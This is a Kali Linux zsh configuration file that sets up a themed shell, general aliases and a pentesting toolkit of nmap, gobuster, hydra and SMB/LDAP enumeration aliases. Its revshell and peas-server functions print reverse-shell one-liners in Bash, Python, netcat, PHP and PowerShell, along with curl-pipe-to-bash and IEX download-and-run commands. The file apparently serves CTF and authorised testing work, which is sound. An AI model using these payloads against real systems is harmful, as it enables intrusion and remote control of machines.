# ╔═══════════════════════════════════════════════════════════╗
# ║                      ZSHRC CONFIG                         ║
# ║              Cyberpunk Theme for Kali Linux               ║
# ╚═══════════════════════════════════════════════════════════╝

# Path to Oh My Zsh installation
export ZSH="$HOME/.oh-my-zsh"

# Theme
ZSH_THEME="powerlevel10k/powerlevel10k"

# Plugins
plugins=(
    git
    zsh-autosuggestions
    zsh-syntax-highlighting
    sudo
    web-search
    copypath
    copyfile
    copybuffer
    dirhistory
    history
    colored-man-pages
    command-not-found
)

source $ZSH/oh-my-zsh.sh

# ─────────────────────────────────────────────────────────────
# User Configuration
# ─────────────────────────────────────────────────────────────

# Preferred editor
export EDITOR='nvim'
export VISUAL='nvim'

# Language environment
export LANG=en_US.UTF-8

# PATH
export PATH="$HOME/.local/bin:$PATH"

# ─────────────────────────────────────────────────────────────
# Aliases
# ─────────────────────────────────────────────────────────────

# Navigation
alias ..='cd ..'
alias ...='cd ../..'
alias ....='cd ../../..'
alias ~='cd ~'

# List (using exa if available)
if command -v exa &> /dev/null; then
    alias ls='exa --icons --group-directories-first'
    alias ll='exa -lah --icons --group-directories-first'
    alias la='exa -a --icons --group-directories-first'
    alias lt='exa --tree --level=2 --icons'
else
    alias ls='ls --color=auto'
    alias ll='ls -lah'
    alias la='ls -a'
fi

# Cat (using bat if available)
if command -v bat &> /dev/null; then
    alias cat='bat --style=auto'
fi

# Grep with color
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'

# Confirm before overwriting
alias cp='cp -i'
alias mv='mv -i'
alias rm='rm -i'

# System
alias update='sudo apt update && sudo apt upgrade -y'
alias install='sudo apt install'
alias remove='sudo apt remove'
alias clean='sudo apt autoremove && sudo apt autoclean'

# Network
alias myip='curl -s https://ipinfo.io/ip'
alias localip='hostname -I'
alias ports='netstat -tulanp'

# Git
alias gs='git status'
alias ga='git add'
alias gc='git commit -m'
alias gp='git push'
alias gl='git pull'
alias glog='git log --oneline --graph --decorate'

# BSPWM
alias bsprc='$EDITOR ~/.config/bspwm/bspwmrc'
alias sxhkdrc='$EDITOR ~/.config/sxhkd/sxhkdrc'
alias polyrc='$EDITOR ~/.config/polybar/config.ini'
alias kittyrc='$EDITOR ~/.config/kitty/kitty.conf'

# Quick edit configs
alias zshrc='$EDITOR ~/.zshrc'
alias reload='source ~/.zshrc'

# ─────────────────────────────────────────────────────────────
# Pentesting - Reconocimiento
# ─────────────────────────────────────────────────────────────

# IP y red
alias tun0='ip addr show tun0 | grep -oP "(?<=inet\s)\d+(\.\d+){3}"'
alias eth0ip='ip addr show eth0 | grep -oP "(?<=inet\s)\d+(\.\d+){3}"'
alias myip='curl -s https://ipinfo.io/ip'
alias netinfo='ip -br a'

# Servidores rápidos
alias serv='python3 -m http.server 80'
alias serv8000='python3 -m http.server 8000'
alias servphp='php -S 0.0.0.0:80'
alias smb-server='impacket-smbserver share $(pwd) -smb2support'

# Nmap - Escaneos comunes
alias nmap-quick='nmap -sC -sV -O -T4'
alias nmap-full='nmap -sC -sV -O -p- -T4'
alias nmap-udp='sudo nmap -sU --top-ports 100 -T4'
alias nmap-vuln='nmap --script vuln -T4'
alias nmap-stealth='sudo nmap -sS -T2'
alias nmap-ping='nmap -sn'

# Gobuster / Dirbusting
alias gobuster-dir='gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -u'
alias gobuster-vhost='gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u'
alias gobuster-dns='gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d'
alias ferox='feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -u'

# FFuf
alias ffuf-dir='ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -u'
alias ffuf-vhost='ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.TARGET" -u'

# Enumeración web
alias whatweb='whatweb -a 3'
alias nikto-scan='nikto -h'
alias wpscan-enum='wpscan --enumerate ap,at,u --url'

# Enumeración SMB
alias smb-enum='enum4linux -a'
alias smb-shares='smbclient -L'
alias smb-map='smbmap -H'
alias crackmapexec-smb='crackmapexec smb'

# Enumeración LDAP
alias ldap-search='ldapsearch -x -H ldap:// -b'
alias ldap-enum='ldapdomaindump -u "DOMAIN\\user" -p password'

# DNS
alias dns-zone='dig axfr @'
alias dns-enum='dnsenum'
alias dns-recon='dnsrecon -d'

# Subdomain enumeration
alias subfinder='subfinder -d'
alias amass-enum='amass enum -passive -d'
alias assetfinder='assetfinder --subs-only'

# Credenciales
alias hydra-ssh='hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://'
alias hydra-ftp='hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://'

# ─────────────────────────────────────────────────────────────
# Functions
# ─────────────────────────────────────────────────────────────

# Create directory and cd into it
mkcd() {
    mkdir -p "$1" && cd "$1"
}

# Extract any archive
extract() {
    if [ -f "$1" ]; then
        case "$1" in
            *.tar.bz2)   tar xvjf "$1"    ;;
            *.tar.gz)    tar xvzf "$1"    ;;
            *.tar.xz)    tar xvJf "$1"    ;;
            *.bz2)       bunzip2 "$1"     ;;
            *.rar)       unrar x "$1"     ;;
            *.gz)        gunzip "$1"      ;;
            *.tar)       tar xvf "$1"     ;;
            *.tbz2)      tar xvjf "$1"    ;;
            *.tgz)       tar xvzf "$1"    ;;
            *.zip)       unzip "$1"       ;;
            *.Z)         uncompress "$1"  ;;
            *.7z)        7z x "$1"        ;;
            *)           echo "Cannot extract '$1'" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}

# Quick HTTP server
serve() {
    local port="${1:-8000}"
    python3 -m http.server "$port"
}

# ─────────────────────────────────────────────────────────────
# Funciones de Reconocimiento
# ─────────────────────────────────────────────────────────────

# Crear estructura de directorios para CTF/Pentest
ctf() {
    local name="${1:-target}"
    mkdir -p "$name"/{nmap,web,exploits,loot,notes}
    cd "$name"
    echo "# Target: $name" > notes/notes.md
    echo "Created: $(date)" >> notes/notes.md
    echo "[+] Directorio CTF creado: $name"
    tree .
}

# Escaneo completo de nmap con output organizado
recon() {
    if [ -z "$1" ]; then
        echo "Uso: recon <IP>"
        return 1
    fi
    local ip="$1"
    local dir="${2:-nmap}"
    mkdir -p "$dir"
    
    echo "[*] Escaneando puertos TCP de $ip..."
    sudo nmap -p- --min-rate=1000 -T4 "$ip" -oN "$dir/ports.txt"
    
    local ports=$(grep -oP '\d+/open' "$dir/ports.txt" | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
    
    if [ -n "$ports" ]; then
        echo "[*] Puertos encontrados: $ports"
        echo "[*] Escaneando servicios..."
        sudo nmap -sC -sV -p"$ports" "$ip" -oN "$dir/services.txt"
    fi
    echo "[+] Escaneo completado. Resultados en $dir/"
}

# Escaneo rápido de nmap
quickscan() {
    if [ -z "$1" ]; then
        echo "Uso: quickscan <IP>"
        return 1
    fi
    sudo nmap -sC -sV -T4 "$1" -oN "quick_$1.txt"
}

# Escaneo UDP top ports
udpscan() {
    if [ -z "$1" ]; then
        echo "Uso: udpscan <IP>"
        return 1
    fi
    sudo nmap -sU --top-ports 50 -T4 "$1" -oN "udp_$1.txt"
}

# Web recon completo
webrecon() {
    if [ -z "$1" ]; then
        echo "Uso: webrecon <URL>"
        return 1
    fi
    local url="$1"
    local dir="${2:-web}"
    mkdir -p "$dir"
    
    echo "[*] Whatweb..."
    whatweb -a 3 "$url" | tee "$dir/whatweb.txt"
    
    echo "[*] Gobuster..."
    gobuster dir -u "$url" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o "$dir/gobuster.txt" 2>/dev/null &
    
    echo "[+] Gobuster corriendo en background. Resultados en $dir/"
}

# Buscar exploits
searchsploit-copy() {
    if [ -z "$1" ]; then
        echo "Uso: searchsploit-copy <exploit_id>"
        return 1
    fi
    searchsploit -m "$1"
}

# Reverse shell generator
revshell() {
    local ip="${1:-$(ip addr show tun0 2>/dev/null | grep -oP '(?<=inet\s)\d+(\.\d+){3}')}"
    local port="${2:-4444}"
    
    if [ -z "$ip" ]; then
        ip=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
    fi
    
    echo "============================================"
    echo "         REVERSE SHELLS - $ip:$port"
    echo "============================================"
    echo ""
    echo "--- Bash ---"
    echo "bash -i >& /dev/tcp/$ip/$port 0>&1"
    echo "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'"
    echo ""
    echo "--- Python ---"
    echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    echo ""
    echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    echo ""
    echo "--- NC ---"
    echo "nc -e /bin/bash $ip $port"
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f"
    echo ""
    echo "--- PHP ---"
    echo "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
    echo ""
    echo "--- PowerShell ---"
    echo "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$ip',$port);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""
    echo ""
    echo "============================================"
    echo "Listener: nc -lvnp $port"
    echo "============================================"
}

# TTY upgrade helper
ttyupgrade() {
    echo "============================================"
    echo "         TTY UPGRADE COMMANDS"
    echo "============================================"
    echo ""
    echo "1. python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
    echo "2. Ctrl+Z"
    echo "3. stty raw -echo; fg"
    echo "4. reset"
    echo "5. export TERM=xterm"
    echo "6. export SHELL=bash"
    echo "7. stty rows 38 columns 116"
    echo ""
}

# Listener netcat
listen() {
    local port="${1:-4444}"
    echo "[*] Escuchando en puerto $port..."
    nc -lvnp "$port"
}

# Copiar IP de tun0 al portapapeles
cpip() {
    local ip=$(ip addr show tun0 2>/dev/null | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
    if [ -z "$ip" ]; then
        ip=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
    fi
    echo -n "$ip" | xclip -selection clipboard
    echo "[+] IP copiada: $ip"
}

# Enum4linux wrapper
enum-smb() {
    if [ -z "$1" ]; then
        echo "Uso: enum-smb <IP>"
        return 1
    fi
    enum4linux -a "$1" | tee "enum4linux_$1.txt"
}

# LinPEAS/WinPEAS server
peas-server() {
    local port="${1:-8000}"
    echo "[*] Sirviendo PEAS en puerto $port"
    echo "[+] Linux: curl http://$(tun0):$port/linpeas.sh | bash"
    echo "[+] Windows: IEX(New-Object Net.WebClient).downloadString('http://$(tun0):$port/winpeas.bat')"
    cd /usr/share/peass 2>/dev/null || cd /opt/peass 2>/dev/null || echo "[!] PEAS no encontrado"
    python3 -m http.server "$port"
}

# ─────────────────────────────────────────────────────────────
# Keybindings
# ─────────────────────────────────────────────────────────────
bindkey '^[[A' history-search-backward
bindkey '^[[B' history-search-forward
bindkey '^[[H' beginning-of-line
bindkey '^[[F' end-of-line
bindkey '^[[3~' delete-char

# ─────────────────────────────────────────────────────────────
# History
# ─────────────────────────────────────────────────────────────
HISTSIZE=10000
SAVEHIST=10000
HISTFILE=~/.zsh_history
setopt HIST_IGNORE_ALL_DUPS
setopt HIST_FIND_NO_DUPS
setopt INC_APPEND_HISTORY
setopt SHARE_HISTORY

# ─────────────────────────────────────────────────────────────
# Powerlevel10k Instant Prompt
# ─────────────────────────────────────────────────────────────
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
  source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi

# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh

# ─────────────────────────────────────────────────────────────
# Welcome Message
# ─────────────────────────────────────────────────────────────
if command -v neofetch &> /dev/null; then
    neofetch
fi
